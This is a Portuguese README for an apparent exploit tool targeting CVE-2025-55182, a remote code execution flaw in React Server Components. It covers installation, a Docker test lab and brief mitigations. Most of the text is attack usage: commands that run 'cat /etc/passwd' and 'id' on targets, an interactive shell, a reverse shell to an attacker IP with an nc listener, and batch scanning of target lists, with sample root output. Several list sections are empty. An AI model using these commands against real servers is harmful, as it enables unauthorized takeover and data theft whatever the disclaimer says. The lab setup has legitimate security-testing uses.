Exploit baseado em Python para CVE-2025-55182 (RCE em React Server Components) com shell interativo, reverse shell, varredura em lote e ambiente vulnerável baseado em Docker para testes de segurança autorizados.
⚠️ Aviso Legal: Esta ferramenta destina-se apenas a pesquisa de segurança, testes de penetração autorizados e fins educacionais. Usar esta ferramenta contra sistemas alvo sem permissão explícita é ilegal e antiético.
CVE-2025-55182 é uma vulnerabilidade crítica de execução remota de código (RCE) nos React Server Components (RSC), permitindo que um atacante não autenticado execute código arbitrário no servidor através de desserialização maliciosa de JavaScript.
| Propriedade | Valor |
|---|
| ID CVE | CVE-2025-55182 |
| Pontuação CVSS | 9.8 (Crítico) |
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Nenhum |
| Interação do Utilizador | Nenhuma |
| Impacto | Alto (Confidencialidade, Integridade, Disponibilidade) |
| Componente Afetado | React Server Components (RSC) |
| Versões Afetadas | React 18.x - 19.x (builds específicas) |
| Data de Divulgação | 3 de Dezembro de 2025 |
| Alias CVE | React2Shell |
Causa Raiz: O React Server Components desserializa incorretamente objetos JavaScript fornecidos pelo utilizador ao processar payloads RSC, permitindo que um atacante injete código malicioso executado no servidor.
Vetor de Ataque: Payloads RSC maliciosos em requisições HTTP Impacto: Execução remota de código sem autenticação, tomada de servidor, fuga de dados
# Clonar o repositório
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# Instalar dependências
pip install -r requirements.txt
# Instalar dependências
pip install requests
# Executar comando no alvo vulnerável
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# Modo shell interativo
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# Comando personalizado
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# Estabelecer reverse shell com IP/porta personalizados
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# Scan em lote
python exploit/batch_scanner.py -f targets.txt
# Modo verboso
python exploit/cve_2025_55182.py -u http://target.com -v
# User-Agent personalizado
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
Aceder à aplicação vulnerável: http://localhost:3000
Executar um único comando no servidor vulnerável:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
Saída Esperada:
[+] Deteção de vulnerabilidade bem-sucedida: RCE em React Server Components
[+] A executar comando: id
[+] Resposta:
uid=0(root) gid=0(root) groups=0(root)
Obter uma shell interativa no servidor vulnerável:
python exploit/cve_2025_55182.py -u http://target.com --shell
Funcionalidades:
Estabelecer uma conexão reverse shell:
# Na máquina do atacante
nc -lvnp 4444
# Executar a ferramenta de exploração
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
Varrer múltiplos alvos à procura da vulnerabilidade:
# Criar ficheiro de alvos
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# Executar o scanner em lote
python exploit/batch_scanner.py -f targets.txt
Atualizar o React
npm install react@latest
# Atualizar para a versão corrigida
Bloquear Requisições RSC
// Desativar temporariamente RSC
const config = {
enableRSC: false
}
Regras WAF
# Montar ambiente vulnerável
cd target && docker-compose up -d
# Testar a vulnerabilidade
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# Executar o conjunto de testes
python tests/test_exploit.py
Esta ferramenta demonstra:
Este projeto está licenciado sob a licença MIT - veja o ficheiro LICENSE para mais detalhes.
Importante: Esta ferramenta destina-se exclusivamente a fins educacionais e de teste de segurança autorizado.
Ao utilizar esta ferramenta, concorda em:
Se encontrar esta vulnerabilidade em sistemas de produção:
Reporte ao fornecedor
Atribuição CVE
Comunidade de Segurança
Lembre-se: A pesquisa de segurança deve ser sempre ética e legal. Use as suas competências para tornar a Internet mais segura! 🛡️